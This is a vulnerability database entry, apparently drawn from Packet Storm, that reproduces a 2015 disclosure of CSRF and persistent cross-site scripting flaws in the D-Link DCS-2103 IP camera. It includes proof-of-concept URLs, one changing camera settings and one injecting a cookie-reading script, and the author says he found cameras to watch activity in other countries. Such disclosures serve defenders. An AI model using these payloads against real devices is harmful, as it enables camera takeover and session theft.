ID

VAR-E-201507-0488


TITLE

D-Link DCS-2103 1.20 CSRF / Cross Site Scripting

Trust: 0.5

sources: PACKETSTORM: 132868

DESCRIPTION

D-Link DCS-2103 version 1.20 suffers from cross site request forgery and cross site scripting vulnerabilities.

Trust: 0.5

sources: PACKETSTORM: 132868

AFFECTED PRODUCTS

vendor:d linkmodel:dcs-2103scope:eqversion:1.20

Trust: 0.5

sources: PACKETSTORM: 132868

EXPLOIT

Hello list!

There are Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities in D-Link DCS-2103 (IP camera).

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. Version 1.20
and previous versions also must be vulnerable.

----------
Details:
----------

Cross-Site Request Forgery (WASC-09):

CSRF vulnerabilities in all sections of admin panel. E.g. change DEVICE
SETTING (parameters: IP camera Name, Enable OSD, Label, Show time).

http://site/vb.htm?cameratitle=Test&tstampenable=1&tstamplabel=Test&tstampformat=1

Cross-Site Scripting (WASC-08):

http://site/vb.htm?tstamplabel=</script><script>alert(document.cookie)</script>

This is persistent XSS. The code will execute at pages: maintenance.htm,
maintenance_device.htm, maintenance_backup_restore.htm,
maintenance_firmware_upgrade.htm.

------------
Timeline:
------------

2014.08.01 - announced at my site about previous vulnerabilities in
DCS-2103.
2014.11.14-2014.12.13 - conversation with D-Link about vulnerabilities in
DCS-2103.
2014.11.27 - announced at my site about new vulnerabilities in DCS-2103.
2015.07.23 - disclosed at my site (http://websecurity.com.ua/7476/).

I found this and other web cameras during summer 2014 to watch terrorists
activities in Donetsk and Lugansks regions of Ukraine and also in Russia
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-July/009110.html).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Trust: 0.5

sources: PACKETSTORM: 132868

EXPLOIT HASH

LOCAL

SOURCE

md5: 9735060d7d88b4dd87100292e4c7f6f3
sha-1: 3a81365bf29ee7f857b71c7ceb6da988851a94cb
sha-256: 4d98416040832150a16ffa2a1c213edb24bd98271d14dbe192d4aa550a9fd010
md5: 9735060d7d88b4dd87100292e4c7f6f3

Trust: 0.5

sources: PACKETSTORM: 132868

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 132868

TYPE

xss, csrf

Trust: 0.5

sources: PACKETSTORM: 132868

TAGS

tag:exploit

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:xss

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 132868

CREDITS

MustLive

Trust: 0.5

sources: PACKETSTORM: 132868

EXTERNAL IDS

db:PACKETSTORMid:132868

Trust: 0.5

sources: PACKETSTORM: 132868

SOURCES

db:PACKETSTORMid:132868

LAST UPDATE DATE

2022-07-27T09:15:28.974000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:132868date:2015-07-28T13:33:33